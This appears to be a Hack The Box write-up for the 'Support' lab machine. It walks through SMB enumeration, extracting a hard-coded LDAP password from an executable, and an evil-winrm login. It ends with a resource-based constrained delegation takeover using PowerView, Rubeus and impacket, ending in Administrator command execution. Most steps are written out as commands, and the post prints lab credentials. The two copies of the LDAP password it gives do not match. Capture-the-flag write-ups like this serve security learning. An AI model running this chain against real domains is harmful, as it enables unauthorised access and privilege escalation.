Support — Hackthebox walkthrough
User
Nmap reveals quite a lot of open ports
nmap -p- -A -sC -sV 10.10.11.174
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2022-08-01 06:22:40Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49670/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49675/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49699/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
63721/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Aggressive OS guesses: Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.92%E=4%D=8/1%OT=53%CT=%CU=%PV=Y%DS=2%DC=T%G=N%TM=62E77198%P=x86_64-pc-linux-gnu)
SEQ(SP=107%GCD=1%ISR=109%TI=I%II=I%SS=S%TS=A)
OPS(O1=M54DNW8ST11%O2=M54DNW8ST11%O3=M54DNW8NNT11%O4=M54DNW8ST11%O5=M54DNW8ST11%O6=M54DST11)
WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FFDC)
ECN(R=Y%DF=Y%TG=80%W=FFFF%O=M54DNW8NNS%CC=Y%Q=)
T1(R=Y%DF=Y%TG=80%S=O%A=S+%F=AS%RD=0%Q=)Uptime guess: 0.337 days (since Sun Jul 31 18:18:26 2022)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
One thing I noted was that this had no HTTP server that was worth looking into. Moving forward, I saw port 139 and port 445 were open. So I started digging in to smb enumeration. Starting with listing the shares.
smbclient -L \\10.10.11.174
I saw there was a share named support-tools was there. Looking there, I found a couple of files, UserInfo.exe.zip felt little interesting.
smbclient \\10.10.11.174\support-tools
Therefore I downloaded it and unzipped it.
get UserInfo.exe.zip
unzip UserInfo.exe.zip
Inside the ZIP file, I saw an executable named UserInfo.exe So I transferred it to my windows machine and tried executing to see what it does.
It was a simple program which allowed me to query for users from their server. From here, there are 2 ways, you can either go for static analysis or go for dynamic analysis. First I will talk about static analysis.
Static analysis
Starting off, I thought of putting the executable into dnspy and looking for any hard-coded strings. While doing that I found a function that does a LDAP query to thier LDAP server
Then I was easily able to find a hard-coded password hash that was used in the authentication process.
With this I tried to create a script that would decrypt the hash for me but I wasn’t able to get that to work. I what I did was I setup a breakpoint in this location and ran the script in dnspy Once the breakpoint hits I stepped over the instructions step by step until the it gets decrypted. And after a couple of instructions I was able to get the decrypted password.
USER: ldap
PASS: nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmzDynamic analysis
For this method, we can stand up a fake LDAP server and point support.htb to our server and get the credentials that way. But for this you can’t execute the UserInfo.exe in a recent window installation because this way you will get the NTML hash instead of the actual password due to security mitigation from windows.
Therefore, we have to use wine in linux to execute the it. First, we edit /etc/hosts and point support.htb to our IP. Then we have to start responder
sudo responder -A -v -I eth0
Then we can run the executable
wine64 UserInfo.exe find -first administrator
By this way as well, we can retrieve the password.
Moving forward with this credentials, I was able to access their LDAP service. So I used ldapdomaindump to dump the information from the server for me.
ldapdomaindump 'ldap://support.htb' -u 'support.htb\ldap' -p 'nvEfEK16^aM4$e7AclUf8x$tRWxPWO1%lmz'
This gave my some files to go through, looking at those, I found something in domain_users.json file. (If you prefer GUI workspace, you could use jxplorere instead)
It seemed to look like a password. I was there was another on the box named support so I tried logging in with this password with evil-winrm and it worked.
evil-winrm -u support -p Ironside47pleasure40Watchful -i 10.10.11.174
Root
Since this box had kerberose and ldap running I knew the root part was a some sort of AD attack. So enumerating the Domain controller, I found that the support user had WRITE privilege on that computer’s AD object.
Doing a little googling around I found this leads to a RCBD (Resource-based Constrained Delegation) Computer Object Takeover
Above article goes over how we can take over administrator’s account by adding a fake computer and impersonating the administrator user.
For that, first I had to download Powercat and PowerView modules and import them. Also I needed Rubeus.exe too. (You can get this from a simple google search, once you have downloaded them to the box import them the powershell scripts with . powercat.ps1)
First step would be to add a fake computer.
New-MachineAccount -MachineAccount kavi -Password $(ConvertTo-SecureString 'kavi' -AsPlainText -Force) -Verbose
Then we need to get the objectsid of the machine we added.
Get-DomainComputer kavi
Then I created a new raw security descriptor for the kavi computer principal.
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1677581083-3380853377-188903654-5102)"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Then we apply the security descriptor bytes to the target kavi machine. Then means we are setting msds-allowedtoactonbehalfofotheridentity attribute to be able to impersonate Administrator.
Get-DomainComputer dc | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose
You can verify if this attributes were set with this.
Get-DomainComputer dc -Properties 'msds-allowedtoactonbehalfofotheridentity'
Once this is done, we have to generate the RC4 hash of the password we set for the kavi computer.
R
ubeus.exe hash /password:kavi /user:kavi /domain:support.htb
After this step I wasn’t able to follow the exact same steps mentioned in the article. Even once I was done with all the steps, I still wasn’t able to execute commands as administrator. So I thought of using Impacket instead.
First, I used impacket’s getST.py to get a service ticket impersonating the administrator with the password hash we just got.
impacket-getST support.htb/kavi$ -spn http/dc.support.htb -hashes :F79159BA40C86F7122602A9520CB4CAB -impersonate administrator
Once I had the ticket, I imported the ticket as an environment variable to use it.
export KRB5CCNAME=administrator.ccache
Then I just used atexec to execute commands as Administrator
impacket-atexec -k -no-pass dc.support.htb 'whoami'
Rooted!
“If you have any questions, make sure to leave them down in the comments, or contact me through social media.”
Email — iamkavigihan@gmail.com
Instagram — https://www.instagram.com/_kavi.gihan/
Discord — kavigihan#8518
Happy Hacking !!! 😄
